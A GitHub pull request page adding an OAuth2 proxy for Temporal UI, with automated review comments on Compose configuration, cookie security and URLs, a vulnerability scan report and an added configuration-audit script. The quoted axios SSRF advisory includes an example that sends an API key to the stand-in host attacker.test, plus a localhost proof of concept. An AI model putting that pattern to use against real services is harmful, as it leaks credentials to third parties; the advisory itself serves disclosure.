
feat: implement OAuth2 proxy for Temporal UI authentication#10

Merged
anatolyshipitz merged 31 commits into
mainfrom
feature/64524-temporal-ui-google-auth
Apr 29, 2025

Conversation

anatolyshipitz (Collaborator) commented Apr 25, 2025

implement OAuth2 proxy for Temporal UI authentication

Refs #64524


…tion

- Add comprehensive OAuth2 proxy setup guide
- Document Google OAuth2 configuration steps
- Add environment variables configuration
- Include Docker Compose setup instructions
- Add troubleshooting section
- Document security considerations

Refs #64524
coderabbitai Bot commented Apr 25, 2025

Walkthrough

This update introduces several new configuration and documentation files, and modifies existing Docker and environment setup files. New documentation is provided for OAuth2 Proxy and AWS Application Load Balancer (ALB) setup. The .dockerignore file is added to optimize Docker build contexts. The Docker Compose files are updated to include OAuth2 Proxy service for production, refine service environment variables, and add file watch capabilities for development. The .env.example file is updated with new placeholders for OAuth2 Proxy and Google OAuth credentials. The README is updated to clarify the port usage for Temporal UI and OAuth2 Proxy.

Changes

| File(s) | Change Summary |
| --- | --- |
| .dockerignore | Added a comprehensive ignore file to exclude unnecessary files and directories from Docker build contexts. |
| docker-compose.yml | Added develop sections with watch directives for n8n and temporal services; removed three environment variables from temporal service. |
| docker-compose.prod.yml | Added new oauth2-proxy service for OAuth2 authentication; reset ports for temporal-ui service. |
| .env.example | Added N8N_HOST and OAuth2 Proxy/Google OAuth environment variable placeholders. |
| README.md | Updated Temporal UI port description to indicate combined use with OAuth2 proxy on port 8080. |
| docs/oauth2-proxy.md | Added new documentation detailing OAuth2 Proxy setup with Google OAuth for production environments. |
| docs/alb.md | Added new documentation describing AWS Application Load Balancer architecture and configuration, including a Mermaid diagram. |

Sequence Diagram(s)

```mermaid
sequenceDiagram
    participant User
    participant Browser
    participant OAuth2-Proxy
    participant GoogleOAuth
    participant Temporal-UI

    User->>Browser: Access Temporal-UI URL
    Browser->>OAuth2-Proxy: HTTP request (port 8080)
    OAuth2-Proxy-->>Browser: Check authentication cookie
    alt Not authenticated
        OAuth2-Proxy->>GoogleOAuth: Redirect to Google OAuth login
        GoogleOAuth->>Browser: User authenticates
        Browser->>OAuth2-Proxy: Redirect with OAuth code
        OAuth2-Proxy->>GoogleOAuth: Exchange code for token
        GoogleOAuth-->>OAuth2-Proxy: Return token
        OAuth2-Proxy-->>Browser: Set authentication cookie
    end
    OAuth2-Proxy->>Temporal-UI: Proxy request to Temporal-UI
    Temporal-UI-->>OAuth2-Proxy: Response
    OAuth2-Proxy-->>Browser: Return Temporal-UI content
```
```mermaid
sequenceDiagram
    participant User
    participant Browser
    participant AWS ALB
    participant n8n
    participant OAuth2-Proxy
    participant Temporal-UI

    User->>Browser: Access n8n or Temporal-UI URL
    Browser->>AWS ALB: HTTPS request (port 443)
    alt n8n path
        AWS ALB->>n8n: Forward to n8n target group (port 5678)
        n8n-->>AWS ALB: Response
    else Temporal-UI path
        AWS ALB->>OAuth2-Proxy: Forward to OAuth2-Proxy target group (port 8080)
        OAuth2-Proxy->>Temporal-UI: Proxy request if authenticated
        Temporal-UI-->>OAuth2-Proxy: Response
        OAuth2-Proxy-->>AWS ALB: Response
    end
    AWS ALB-->>Browser: Return content
```

Suggested reviewers

  • killev

📜 Recent review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between b0afa64 and c69f062.

📒 Files selected for processing (1)
  • README.md (2 hunks)
🚧 Files skipped from review as they are similar to previous changes (1)
  • README.md
⏰ Context from checks skipped due to timeout of 90000ms (2)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
  • GitHub Check: Service Availability Check

github-actions Bot commented Apr 25, 2025

🔍 Vulnerabilities of n8n-test:latest

📦 Image Reference n8n-test:latest
digest: sha256:0387d6dec298e69e15ab2dd0ea3127178cf1457f8e26a2ab5e78a6ca9b4e514c
vulnerabilities: critical 1, high 4, medium 0, low 0
platform: linux/amd64
size: 243 MB
packages: 1628
📦 Base Image node:20-alpine
also known as
  • 20-alpine3.21
  • 20.19-alpine
  • 20.19-alpine3.21
  • 20.19.0-alpine
  • 20.19.0-alpine3.21
  • iron-alpine
  • iron-alpine3.21
digest: sha256:37a5a350292926f98d48de9af160b0a3f7fcb141566117ee452742739500a5bd
vulnerabilities: critical 0, high 1, medium 0, low 0
critical: 1 high: 0 medium: 0 low: 0 stdlib 1.24.0 (golang)

pkg:golang/stdlib@1.24.0

critical: CVE-2025-22871

Affected range: >=1.24.0-0, <1.24.2
Fixed version: 1.24.2
EPSS score: 0.015% (2nd percentile)
Description

The net/http package improperly accepts a bare LF as a line terminator in chunked data chunk-size lines. This can permit request smuggling if a net/http server is used in conjunction with a server that incorrectly accepts a bare LF as part of a chunk-ext.

critical: 0 high: 1 medium: 0 low: 0 semver 5.3.0 (npm)

pkg:npm/semver@5.3.0

high 7.5: CVE-2022-25883 Inefficient Regular Expression Complexity

Affected range: <5.7.2
Fixed version: 5.7.2
CVSS score: 7.5
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS score: 0.308% (53rd percentile)
Description

Versions of the package semver before 7.5.2 on the 7.x branch, before 6.3.1 on the 6.x branch, and all other versions before 5.7.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.

critical: 0 high: 1 medium: 0 low: 0 axios 1.7.4 (npm)

pkg:npm/axios@1.7.4

high 7.7: CVE-2025-27152 Server-Side Request Forgery (SSRF)

Affected range: >=1.0.0, <1.8.2
Fixed version: 1.8.2
CVSS score: 7.7
CVSS vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
EPSS score: 0.056% (18th percentile)
Description

Summary

A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery).
Reference: axios/axios#6463

A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.

Details

Consider the following code snippet:

```javascript
import axios from "axios";

const internalAPIClient = axios.create({
  baseURL: "http://example.test/api/v1/users/",
  headers: {
    "X-API-KEY": "1234567890",
  },
});

// const userId = "123";
const userId = "http://attacker.test/";

await internalAPIClient.get(userId); // SSRF
```

In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.

It is recommended that:

  • When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL.
  • Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL.

PoC

Follow the steps below to reproduce the issue:

  1. Set up two simple HTTP servers:

```bash
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
```

  2. Create a script (e.g., main.js):

```javascript
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
```

  3. Run the script:

```
$ node main.js
this is server2
```

Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/.

Impact

  • Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
  • SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
  • Affected Users: Software that uses baseURL and does not validate path parameters is affected by this issue.
critical: 0 high: 1 medium: 0 low: 0 cross-spawn 7.0.3 (npm)

pkg:npm/cross-spawn@7.0.3

high 7.5: CVE-2024-21538 Inefficient Regular Expression Complexity

Affected range: >=7.0.0, <7.0.5
Fixed version: 7.0.5
CVSS score: 7.5
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS score: 0.132% (34th percentile)
Description

Versions of the package cross-spawn before 7.0.5 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string.

critical: 0 high: 1 medium: 0 low: 0 pdfjs-dist 2.16.105 (npm)

pkg:npm/pdfjs-dist@2.16.105

high 8.8: CVE-2024-4367 Improper Check for Unusual or Exceptional Conditions

Affected range: <=4.1.392
Fixed version: 4.2.67
CVSS score: 8.8
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS score: 14.484% (94th percentile)
Description

Impact

If pdf.js is used to load a malicious PDF, and PDF.js is configured with isEvalSupported set to true (which is the default value), unrestricted attacker-controlled JavaScript will be executed in the context of the hosting domain.

Patches

The patch removes the use of eval:
mozilla/pdf.js#18015

Workarounds

Set the option isEvalSupported to false.

References

https://bugzilla.mozilla.org/show_bug.cgi?id=1893645

coderabbitai Bot left a comment

Actionable comments posted: 2

🧹 Nitpick comments (7)
.dockerignore (2)

14-15: Remove redundant patterns
The *~ pattern appears twice in the Development files section (lines 14–15) and again in the Linux section (line 120). Consolidating these entries will reduce duplication.

Also applies to: 119-121


137-140: Trim trailing space in pattern
Line 140 (*.vhdx ) has a trailing space. Remove it to prevent unintended mismatches.

docker-compose.override.yml.example (1)

1-7: Inconsistent volume naming conventions
The example uses n8n_data (underscore) alongside opensearch-data and postgresql-data (hyphens). Standardizing on one convention (e.g., hyphens) will make config easier to read and maintain.

docs/oauth2-proxy.md (1)

23-26: Highlight insecure defaults for production
Defaults like cookie-secret-1234567890 and OAUTH2_PROXY_COOKIE_SECURE=false are insecure. Add a prominent security warning advising to:

  1. Generate a strong OAUTH2_PROXY_COOKIE_SECRET.
  2. Set OAUTH2_PROXY_COOKIE_SECURE=true behind TLS.
docker-compose.yml (3)

151-151: Cleanup trailing whitespace
YAMLLint flags trailing spaces on these lines. Removing them prevents lint failures:

-      - OAUTH2_PROXY_CLIENT_SECRET=${GOOGLE_CLIENT_SECRET:?GOOGLE_CLIENT_SECRET is required}␣
+      - OAUTH2_PROXY_CLIENT_SECRET=${GOOGLE_CLIENT_SECRET:?GOOGLE_CLIENT_SECRET is required}
...

Also applies to: 154-154, 162-162, 170-170, 177-177, 180-180


136-142: Consider healthcheck-based startup for OAuth2 Proxy
Other services use health-conditioned depends_on. To ensure oauth2-proxy only starts once temporal-ui is healthy, you could update:

```yaml
depends_on:
  temporal-ui:
    condition: service_healthy
```

192-196: Document override requirement for persistent volumes
The main volumes: section declares n8n_data, opensearch-data, and postgresql-data without driver options. Remind users—either in your README or this docs file—to apply the docker-compose.override.yml.example for host bindings when persisting data.

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 71a8008 and 21063e9.

📒 Files selected for processing (4)
  • .dockerignore (1 hunks)
  • docker-compose.override.yml.example (1 hunks)
  • docker-compose.yml (3 hunks)
  • docs/oauth2-proxy.md (1 hunks)
🔇 Additional comments (2)
.dockerignore (1)

1-6: Comprehensive coverage of Docker build context exclusions
The patterns cleanly exclude VCS metadata, environment files, IDE configs, language-specific build artifacts, OS temp files, and project-specific binaries, which will significantly reduce build context size and improve build performance.

docker-compose.yml (1)

25-29: Verify support for develop.watch extension
The develop.watch stanza is not part of standard Docker Compose syntax. Confirm that you’re using a Compose plugin or a compatible version (e.g., Compose v2.15+ with the dev extension), and document the requirement for team members.

Also applies to: 112-115

anatolyshipitz and others added 2 commits April 25, 2025 20:06
… production config and docs

Replaced all occurrences of lvh.me with temporal.speedandfunction.com in docker-compose.prod.yml
Updated OAuth2 Proxy documentation to use the new domain and provide correct Google OAuth and .env setup instructions
coderabbitai Bot left a comment

Actionable comments posted: 2

🧹 Nitpick comments (5)
README.md (2)

61-67: Use subheadings instead of bold emphasis for options
Markdown lint flags bold text used as a heading (MD036). Replace **Option A: ...** with a proper Markdown heading, for example:

- **Option A: Using the COMPOSE_FILE environment variable**
+ ##### Option A: Using the COMPOSE_FILE environment variable

72-77: Use subheadings and unify CLI syntax for Option B
Replace the bold emphasis with a heading and standardize the command to docker compose (instead of docker-compose).

- **Option B: Using the -f flag**
+ ##### Option B: Using the -f flag

```diff
- docker-compose -f docker-compose.yml -f docker-compose.prod.yml up -d
+ docker compose -f docker-compose.yml -f docker-compose.prod.yml up -d
```

docker-compose.prod.yml (3)

28-42: Enable secure flags for cookies and CSRF tokens in production
Currently both OAUTH2_PROXY_COOKIE_SECURE=false and OAUTH2_PROXY_CSRF_COOKIE_SECURE=false disable the Secure attribute on cookies. In a production environment behind HTTPS, set these to true to protect cookies.

```diff
- OAUTH2_PROXY_COOKIE_SECURE=false
+ OAUTH2_PROXY_COOKIE_SECURE=true

- OAUTH2_PROXY_CSRF_COOKIE_SECURE=false
+ OAUTH2_PROXY_CSRF_COOKIE_SECURE=true
```
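Review bot: the Secure attribute is necessary but not sufficient on its own, because a browser only returns a Secure cookie over https, and the OAUTH2_PROXY_REDIRECT_URL and OAUTH2_PROXY_SIGN_OUT_URL values in this PR's docker-compose.prod.yml still use http://temporal.speedandfunction.com. Since the ALB in docs/alb.md terminates TLS on 443, both URLs should carry the https:// scheme alongside this change; otherwise the post-login redirect lands on an http origin where the session cookie set here is never sent back.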

58-64: Ensure host directories exist for bind-mounted volumes
Binding to absolute paths (/data/n8n, /data/opensearch, /data/postgresql) requires those directories on the Docker host. Document the directory setup script or switch to relative project paths (e.g., ./volumes/...) to avoid permission issues.


16-16: Remove trailing whitespace
Several lines contain extraneous spaces at the end, which can trigger linter errors. Please trim trailing whitespace on the following lines: 16, 19, 27, 35, 42, 45.

Also applies to: 19-19, 27-27, 35-35, 42-42, 45-45

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 21063e9 and 8d6c64f.

📒 Files selected for processing (3)
  • README.md (1 hunks)
  • docker-compose.prod.yml (1 hunks)
  • docker-compose.yml (3 hunks)
🚧 Files skipped from review as they are similar to previous changes (1)
  • docker-compose.yml
⏰ Context from checks skipped due to timeout of 90000ms (2)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
  • GitHub Check: Service Availability Check
🔇 Additional comments (4)
README.md (1)

47-55: Well-structured introduction for service startup
The new section clearly distinguishes development (default) versus production (with overrides) startup workflows. Users will appreciate the clarity.

docker-compose.prod.yml (3)

9-11: Port mapping is correct
Exposing host port 80 to container port 80 matches HTTP-based OAuth2 Proxy defaults. Ensure this aligns with your network setup or adjust if you need a non-standard port.


12-19: Environment variable configuration looks solid
Loading from .env and using mandatory fallback checks for GOOGLE_CLIENT_ID/SECRET is a robust approach. Domain restriction via OAUTH2_PROXY_EMAIL_DOMAINS is well-documented.


48-55: Healthcheck and network configuration
The wget-based healthcheck and attachment to app-network are appropriate. You might consider using curl --fail for clearer exit codes, but this implementation is acceptable.

…oduction

Require OAUTH2_PROXY_COOKIE_SECRET to be explicitly set, removing insecure default
Set OAUTH2_PROXY_COOKIE_SECURE and OAUTH2_PROXY_CSRF_COOKIE_SECURE to true for production
Recommend disabling debug error output in production
Add security best practices for handling secrets and HTTPS enforcement
coderabbitai Bot left a comment

Actionable comments posted: 3

🧹 Nitpick comments (3)
docker-compose.prod.yml (3)

11-11: Quote multi-word environment variable value.

N8N_GOOGLE_SCOPES=email profile contains a space and should be quoted to avoid YAML parsing issues:

-      - N8N_GOOGLE_SCOPES=email profile
+      - N8N_GOOGLE_SCOPES="email profile"

31-31: Remove trailing whitespace.

Several lines have trailing spaces which can cause YAML parsers to complain. Please remove the extra spaces at the end of these lines.

Also applies to: 34-34, 42-42, 50-50, 57-57, 60-60


90-90: Ensure newline at end of file.

Add a final newline to conform with POSIX standards and avoid warnings from linters.

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 8d6c64f and 6b0a1b3.

📒 Files selected for processing (1)
  • docker-compose.prod.yml (1 hunks)
Changed the OAUTH2_PROXY_REDIRECT_URL to use the correct domain temporal.speedandfunction.com for OAuth2 callback in the production docker-compose file.
coderabbitai Bot left a comment

Actionable comments posted: 0

♻️ Duplicate comments (3)
docker-compose.prod.yml (3)

62-62: ⚠️ Potential issue

Fix duplicated domain in sign-out URL.

The OAUTH2_PROXY_SIGN_OUT_URL uses temporal.temporal.speedandfunction.com, which duplicates the subdomain. It should match the intended domain used for the redirect URL.

-        - OAUTH2_PROXY_SIGN_OUT_URL=http://temporal.temporal.speedandfunction.com/oauth2/sign_out
+        - OAUTH2_PROXY_SIGN_OUT_URL=http://temporal.speedandfunction.com/oauth2/sign_out

14-14: ⚠️ Potential issue

Fix indentation of volume mount under n8n.

The list item under volumes: is indented with 8 spaces but should be 6 spaces (2 spaces per nesting level). This incorrect indentation causes YAML parsing errors.

Apply this diff:

-        - /home/ubuntu/volumes/certs:/home/node/certs:ro
+      - /home/ubuntu/volumes/certs:/home/node/certs:ro

17-28: ⚠️ Potential issue

Correct indentation for oauth2-proxy service properties.

The properties under oauth2-proxy: are indented with 6 spaces; they must be 4 spaces to be valid YAML under the services: key. Incorrect indentation will prevent Docker Compose from recognizing these settings.

Apply this diff:

-  oauth2-proxy:
-      container_name: temporal-oauth-proxy
-      image: quay.io/oauth2-proxy/oauth2-proxy:v7.8.0
-      restart: unless-stopped
-      depends_on:
-        - temporal-ui
-      env_file:
-        - .env
-      ports:
-        - "80:80"
-      environment:
-        # Google provider settings
-        - OAUTH2_PROXY_PROVIDER=google
+  oauth2-proxy:
+    container_name: temporal-oauth-proxy
+    image: quay.io/oauth2-proxy/oauth2-proxy:v7.8.0
+    restart: unless-stopped
+    depends_on:
+      - temporal-ui
+    env_file:
+      - .env
+    ports:
+      - "80:80"
+    environment:
+      # Google provider settings
+      - OAUTH2_PROXY_PROVIDER=google
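Review bot: besides the indentation, the restructured service still publishes "80:80", while docs/alb.md in this PR forwards to the OAuth2-Proxy target group on port 8080 and the README change describes the proxy as running on port 8080; reconcile the published port with the documented 8080 (or correct the docs) so the ALB target group and its health checks actually reach the proxy. The earlier suggestion to use depends_on with condition: service_healthy for temporal-ui is also not applied in this hunk, which keeps the plain list form.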
🧹 Nitpick comments (2)
docker-compose.prod.yml (2)

31-60: Remove trailing whitespace from environment lines.

Several environment variable lines have trailing spaces, which are unnecessary and may be flagged by linters.

  • Affected lines: 31, 34, 42, 50, 57, 60

Please remove the trailing spaces or enable automatic trimming in your editor. Example:

-        - OAUTH2_PROXY_PROVIDER=google 
+        - OAUTH2_PROXY_PROVIDER=google

90-90: Add newline at end of file.

POSIX standards and many tools expect a newline character at the end of the file.

Add an empty newline at the end of docker-compose.prod.yml.

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 6b0a1b3 and 1891edc.

📒 Files selected for processing (1)
  • docker-compose.prod.yml (1 hunks)
⏰ Context from checks skipped due to timeout of 90000ms (2)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
  • GitHub Check: Service Availability Check
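
The production pitfalls this review keeps returning to (the placeholder cookie secret, the two *_COOKIE_SECURE flags left at false, http:// OAuth2 URLs, and the duplicated subdomain in OAUTH2_PROXY_SIGN_OUT_URL) can be caught before deploy with a small audit. The script below is an added example, not code from this PR or the project: it assumes the variable names used on this page and a TLS-terminated public endpoint (so both OAuth2 URLs must be https), and its two sample files are constructed, the first mirroring the flagged settings; the /oauth2/callback path is oauth2-proxy's standard callback path, not something this PR shows.

```shell
#!/bin/sh
# Added example, not from the PR or the project. Audits an oauth2-proxy
# configuration for the production pitfalls raised in the review comments.
# Assumes the page's variable names and a TLS-terminated public endpoint (the
# ALB serves HTTPS on 443), so cookies must be Secure and both OAuth2 URLs https.
# Reads plain .env lines or compose "- KEY=value" items, ignoring trailing spaces.

# Cookie secret of a size oauth2-proxy accepts (16, 24 or 32 bytes), URL-safe base64.
gen_cookie_secret() {
    head -c 32 /dev/urandom | base64 | tr -d '\n' | tr '+/' '-_'
}

# Number of raw bytes a URL-safe base64 value decodes to (0 if empty or invalid).
secret_bytes() {
    printf '%s' "$1" | tr '_-' '/+' | base64 -d 2>/dev/null | wc -c | tr -d ' '
}

# Last assignment of key $2 in file $1, trailing spaces and surrounding quotes stripped.
env_get() {
    sed -n "s/^[[:space:]]*-\{0,1\}[[:space:]]*$2=//p" "$1" | tail -n 1 \
        | sed 's/[[:space:]]*$//; s/^"\(.*\)"$/\1/'
}

# Host part of a URL: drop the scheme, then everything from the first '/' or ':'.
url_host() {
    printf '%s' "$1" | sed 's#^[A-Za-z][A-Za-z0-9+.-]*://##; s#[/:].*##'
}

# Prints one "FAIL: ..." line per finding on stderr and the finding count on stdout.
audit_oauth2_env() {
    file=$1
    n=0
    fail() { echo "FAIL: $1" >&2; n=$((n + 1)); }

    secret=$(env_get "$file" OAUTH2_PROXY_COOKIE_SECRET)
    bytes=$(secret_bytes "$secret")
    if [ -z "$secret" ] || [ "$secret" = "cookie-secret-1234567890" ]; then
        fail "OAUTH2_PROXY_COOKIE_SECRET is missing or still the placeholder"
    elif [ "$bytes" != 16 ] && [ "$bytes" != 24 ] && [ "$bytes" != 32 ]; then
        fail "OAUTH2_PROXY_COOKIE_SECRET decodes to $bytes bytes, need 16, 24 or 32"
    fi

    for k in OAUTH2_PROXY_COOKIE_SECURE OAUTH2_PROXY_CSRF_COOKIE_SECURE; do
        [ "$(env_get "$file" "$k")" = "true" ] || fail "$k must be true behind TLS"
    done

    redirect=$(env_get "$file" OAUTH2_PROXY_REDIRECT_URL)
    signout=$(env_get "$file" OAUTH2_PROXY_SIGN_OUT_URL)
    for u in "$redirect" "$signout"; do
        case $u in
            "") fail "OAuth2 redirect or sign-out URL is missing"; continue ;;
            https://*) ;;
            *) fail "URL is not https: $u" ;;
        esac
        # The browser follows these URLs, so a duplicated label such as
        # temporal.temporal.example is an unreachable host, not a cosmetic slip.
        h=$(url_host "$u")
        rest=${h#*.}
        case $h in
            *.*) [ "${h%%.*}" != "${rest%%.*}" ] || fail "repeated subdomain label in $h" ;;
        esac
    done
    [ "$(url_host "$redirect")" = "$(url_host "$signout")" ] \
        || fail "redirect and sign-out URLs point at different hosts"

    echo "$n"
}

# Constructed samples: the first mirrors the settings the review flagged,
# the second is the corrected form with a freshly generated secret.
TMP=$(mktemp -d)
trap 'rm -rf "$TMP"' EXIT
INSECURE_ENV="$TMP/insecure.env"
SECURE_ENV="$TMP/secure.env"

cat > "$INSECURE_ENV" <<'EOF'
OAUTH2_PROXY_COOKIE_SECRET=cookie-secret-1234567890
OAUTH2_PROXY_COOKIE_SECURE=false
OAUTH2_PROXY_CSRF_COOKIE_SECURE=false
OAUTH2_PROXY_REDIRECT_URL=http://temporal.speedandfunction.com/oauth2/callback
OAUTH2_PROXY_SIGN_OUT_URL=http://temporal.temporal.speedandfunction.com/oauth2/sign_out
EOF

cat > "$SECURE_ENV" <<EOF
OAUTH2_PROXY_COOKIE_SECRET=$(gen_cookie_secret)
OAUTH2_PROXY_COOKIE_SECURE=true
OAUTH2_PROXY_CSRF_COOKIE_SECURE=true
OAUTH2_PROXY_REDIRECT_URL=https://temporal.speedandfunction.com/oauth2/callback
OAUTH2_PROXY_SIGN_OUT_URL=https://temporal.speedandfunction.com/oauth2/sign_out
EOF

echo "insecure sample: $(audit_oauth2_env "$INSECURE_ENV") finding(s)"
echo "secure sample:   $(audit_oauth2_env "$SECURE_ENV") finding(s)"
```

Point audit_oauth2_env at the real .env or at the environment block of docker-compose.prod.yml to run the same checks in CI before the stack is brought up.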

Changed the OAUTH2_PROXY_UPSTREAMS from port 80 to 8080 in the production docker-compose file to align with the updated service configuration.

@coderabbitai coderabbitai Bot left a comment

Actionable comments posted: 0

♻️ Duplicate comments (3)
docker-compose.prod.yml (3)

13-14: ⚠️ Potential issue

Fix incorrect indentation for the volumes list under n8n.

The - /home/ubuntu/volumes/certs:/home/node/certs:ro entry is indented 8 spaces but should be 6 to nest correctly under volumes:.

   n8n:
     volumes:
-        - /home/ubuntu/volumes/certs:/home/node/certs:ro
+      - /home/ubuntu/volumes/certs:/home/node/certs:ro
🧰 Tools
🪛 YAMLlint (1.35.1)
[warning] 14-14: wrong indentation: expected 6 but found 8 (indentation)


62-62: ⚠️ Potential issue

Fix duplicated subdomain in OAUTH2_PROXY_SIGN_OUT_URL.

The sign-out URL uses temporal.temporal.speedandfunction.com, resulting in an invalid host. It should match the redirect domain (temporal.speedandfunction.com):

-        - OAUTH2_PROXY_SIGN_OUT_URL=http://temporal.temporal.speedandfunction.com/oauth2/sign_out
+        - OAUTH2_PROXY_SIGN_OUT_URL=http://temporal.speedandfunction.com/oauth2/sign_out

16-19: ⚠️ Potential issue

Correct indentation of oauth2-proxy service properties.

Properties like container_name, image, and restart are over-indented (6 spaces) and won’t be recognized. They must be indented 4 spaces under oauth2-proxy:.

 services:
   oauth2-proxy:
-      container_name: temporal-oauth-proxy
-      image: quay.io/oauth2-proxy/oauth2-proxy:v7.8.0
-      restart: unless-stopped
+    container_name: temporal-oauth-proxy
+    image: quay.io/oauth2-proxy/oauth2-proxy:v7.8.0
+    restart: unless-stopped
🧰 Tools
🪛 YAMLlint (1.35.1)
[warning] 17-17: wrong indentation: expected 4 but found 6 (indentation)

🧹 Nitpick comments (3)
docker-compose.prod.yml (3)

31-60: Remove unnecessary trailing spaces on blank lines.

Blank lines in the environment: block contain leading spaces, triggering [trailing-spaces] lint errors. Strip all spaces from empty lines. Example adjustments:

-        # Email validation settings
-        
+        # Email validation settings

-        # Required settings
-        
+        # Required settings

...and so on for other commented sections...
🧰 Tools
🪛 YAMLlint (1.35.1)
[error] 31-31: trailing spaces (trailing-spaces)
[error] 34-34: trailing spaces (trailing-spaces)
[error] 42-42: trailing spaces (trailing-spaces)
[error] 50-50: trailing spaces (trailing-spaces)
[error] 57-57: trailing spaces (trailing-spaces)
[error] 60-60: trailing spaces (trailing-spaces)


90-90: Ensure newline at end of file.

Add a final newline to comply with POSIX conventions and resolve the new-line-at-end-of-file error.

🧰 Tools
🪛 YAMLlint (1.35.1)
[error] 90-90: no new line character at the end of file (new-line-at-end-of-file)


1-1: Consider specifying a Compose file version.

Although Compose v3 files can omit the version field, it's best practice to declare it (e.g., version: "3.8") at the top for clarity and tooling compatibility.

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 1891edc and e9f7ae4.

📒 Files selected for processing (1)
  • docker-compose.prod.yml (1 hunks)
🧰 Additional context used
🪛 YAMLlint (1.35.1)
docker-compose.prod.yml
[warning] 14-14: wrong indentation: expected 6 but found 8 (indentation)
[warning] 17-17: wrong indentation: expected 4 but found 6 (indentation)
[error] 31-31: trailing spaces (trailing-spaces)
[error] 34-34: trailing spaces (trailing-spaces)
[error] 42-42: trailing spaces (trailing-spaces)
[error] 50-50: trailing spaces (trailing-spaces)
[error] 57-57: trailing spaces (trailing-spaces)
[error] 60-60: trailing spaces (trailing-spaces)
[error] 90-90: no new line character at the end of file (new-line-at-end-of-file)

⏰ Context from checks skipped due to timeout of 90000ms (2)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
  • GitHub Check: Service Availability Check
🔇 Additional comments (1)
docker-compose.prod.yml (1)

69-70: Verify that the app-network network is declared.

The oauth2-proxy service attaches to app-network, but this file doesn’t define a networks: section. Ensure app-network is defined here or in the base docker-compose.yml.

Updated the OAUTH2_PROXY_SIGN_OUT_URL to use the correct domain temporal.speedandfunction.com in the production docker-compose file.

@coderabbitai coderabbitai Bot left a comment

Actionable comments posted: 1

♻️ Duplicate comments (2)
docker-compose.prod.yml (2)

14-14: ⚠️ Potential issue

Fix indentation of the volumes entry under n8n.
The mount point is indented 8 spaces but should be 6 spaces under volumes: (4 spaces).

-    volumes:
-        - /home/ubuntu/volumes/certs:/home/node/certs:ro
+    volumes:
+      - /home/ubuntu/volumes/certs:/home/node/certs:ro
🧰 Tools
🪛 YAMLlint (1.35.1)
[warning] 14-14: wrong indentation: expected 6 but found 8 (indentation)


16-71: ⚠️ Potential issue

Correct indentation for the oauth2-proxy service.
All keys under oauth2-proxy: are over-indented by 2 spaces and won't be recognized. Service properties should be indented 4 spaces (not 6). Apply this pattern throughout the block.

 services:
-  oauth2-proxy:
-      container_name: temporal-oauth-proxy
-      image: quay.io/oauth2-proxy/oauth2-proxy:v7.8.0
-      restart: unless-stopped
-      depends_on:
-        - temporal-ui
-      env_file:
-        - .env
-      ports:
-        - "80:80"
+  oauth2-proxy:
+    container_name: temporal-oauth-proxy
+    image: quay.io/oauth2-proxy/oauth2-proxy:v7.8.0
+    restart: unless-stopped
+    depends_on:
+      - temporal-ui
+    env_file:
+      - .env
+    ports:
+      - "80:80"

(Replicate this indentation fix for environment, healthcheck, networks, etc.)

🧰 Tools
🪛 YAMLlint (1.35.1)
[warning] 17-17: wrong indentation: expected 4 but found 6 (indentation)
[error] 31-31: trailing spaces (trailing-spaces)
[error] 34-34: trailing spaces (trailing-spaces)
[error] 42-42: trailing spaces (trailing-spaces)
[error] 50-50: trailing spaces (trailing-spaces)
[error] 57-57: trailing spaces (trailing-spaces)
[error] 60-60: trailing spaces (trailing-spaces)

🧹 Nitpick comments (2)
docker-compose.prod.yml (2)

31-31: Remove trailing whitespace.
Several blank or comment lines contain unnecessary trailing spaces, triggering lint errors.

Please trim trailing spaces on lines 31, 34, 42, 50, 57, and 60.

Also applies to: 34-34, 42-42, 50-50, 57-57, 60-60

🧰 Tools
🪛 YAMLlint (1.35.1)
[error] 31-31: trailing spaces (trailing-spaces)


